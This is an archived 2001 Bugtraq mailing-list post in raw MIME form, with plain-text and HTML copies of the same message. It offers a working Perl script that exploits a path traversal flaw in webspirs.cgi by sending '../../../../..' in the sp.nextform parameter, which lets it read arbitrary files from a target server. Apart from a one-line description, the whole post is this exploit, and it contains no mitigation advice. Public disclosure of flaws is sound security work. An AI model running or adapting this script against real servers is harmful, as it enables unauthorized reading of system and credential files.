[19978] in bugtraq
Webspirs remote script explotation
daemon@ATHENA.MIT.EDU (Crono)
Sat Mar 31 22:19:34 2001
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0019_01C0BA20.AE9209A0"
X-MDaemon-Deliver-To: bugtraq@securityfocus.com
Message-ID: <001e01c0ba0f$fa63e3a0$65ad74a7@hell>
Date: Sat, 31 Mar 2001 20:25:09 +0200
Reply-To: Crono <crono@THEPENTAGON.COM>
From: Crono <crono@THEPENTAGON.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0019_01C0BA20.AE9209A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
This Perl script can be used to exploit the vulnerability on =
webspirs.cgi, installed on any machine. The vulnerability allow to view =
any file on the machine, breaking the webroot.
#!/usr/bin/perl
# Remote Script to exploit bug in webspirs.cgi
# Affected systems: any where webspirs.cgi are installed
# =20
# Using by default "/"
# Spain 10-3-2001 (Crono) (crono@thepentagon.com)
use LWP::UserAgent;
use Socket;
use Getopt::Std;
getopts("h:v:c:", \%args);
if (!defined $args{h}, !defined $args{v}) {
print qq~
-=3D- WebSpirs Remote Script -=3D- =20
by Crono
Usage: perl unicode.pl -h <host> -v <file>
~;exit;
}
$host=3D$args{h};
$v=3D$args{v};
if (defined $args{h}, $args{v}){
&conectar; }
################
sub conectar {
################
print " - WebSpirs Remote Script Facility - -=3D- By Crono
-=3D-\n";
print "\nAttemtping to get: $v\n";
my $server =3D inet_ntoa(inet_aton($host));
my $url =3D "/cgi-bin/webspirs.cgi?sp.nextform=3D".
"../../../../..".
"$v";
my $ua =3D new LWP::UserAgent;
my $req =3D new HTTP::Request GET =3D>
"http://".$server.$url;
my $res =3D $ua->request($req);
my $web =3D $res->server;
my $code =3D $res->code;
my $content =3D $res->content;
print "$web\t$code\n";
print "$content\n";
}
# Saludos para la pe=A4a que me conoce (ellos saben quien son) :)
------=_NextPart_000_0019_01C0BA20.AE9209A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#c8e0d8>
<DIV><FONT face=3DArial size=3D2>This Perl script can be used to exploit =
the=20
vulnerability on webspirs.cgi, installed on any machine. The =
vulnerability allow=20
to view any file on the machine, breaking the webroot.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#!/usr/bin/perl<BR># Remote =
Script to exploit=20
bug in webspirs.cgi<BR># Affected systems: any where webspirs.cgi =
are=20
installed<BR># <BR># Using by default "/"<BR># Spain=20
10-3-2001 (Crono) (<A=20
href=3D"mailto:crono@thepentagon.com">crono@thepentagon.com</A>)</FONT></=
DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>use LWP::UserAgent;<BR>use =
Socket;<BR>use=20
Getopt::Std;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>getopts("h:v:c:", \%args);<BR>if =
(!defined=20
$args{h}, !defined $args{v}) {<BR>print=20
qq~<BR> =
=20
-=3D- WebSpirs Remote Script -=3D- =20
<BR> &nb=
sp; &nbs=
p; =20
by Crono</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> Usage: perl =
unicode.pl -h=20
<host> -v=20
<file><BR>~;exit;<BR> }<BR>$host=3D$args{h};<BR>$v=3D$args{v};=
<BR>if=20
(defined $args{h}, $args{v}){<BR>&conectar; }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>################<BR>sub =
conectar =20
{<BR>################</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>print " - WebSpirs Remote Script =
Facility=20
- =
-=3D- By=20
Crono<BR>-=3D-\n";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>print "\nAttemtping to get: =
$v\n";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>my $server =3D =
inet_ntoa(inet_aton($host));<BR>my=20
$url =3D=20
"/cgi-bin/webspirs.cgi?sp.nextform=3D".<BR>"../../../../..".<BR>"$v";</FO=
NT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>my $ua =3D new LWP::UserAgent;<BR>my =
$req =3D new=20
HTTP::Request GET =3D><BR>"<A=20
href=3D'http://".$server.$url'>http://".$server.$url</A>;<BR>my $res =3D =
$ua->request($req);<BR>my $web =3D $res->server;<BR>my $code =3D=20
$res->code;<BR>my $content =3D $res->content;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>print "$web\t$code\n";<BR>print=20
"$content\n";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>}<BR># Saludos para la pe=A4a que me =
conoce (ellos=20
saben quien son) :)</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>
------=_NextPart_000_0019_01C0BA20.AE9209A0--
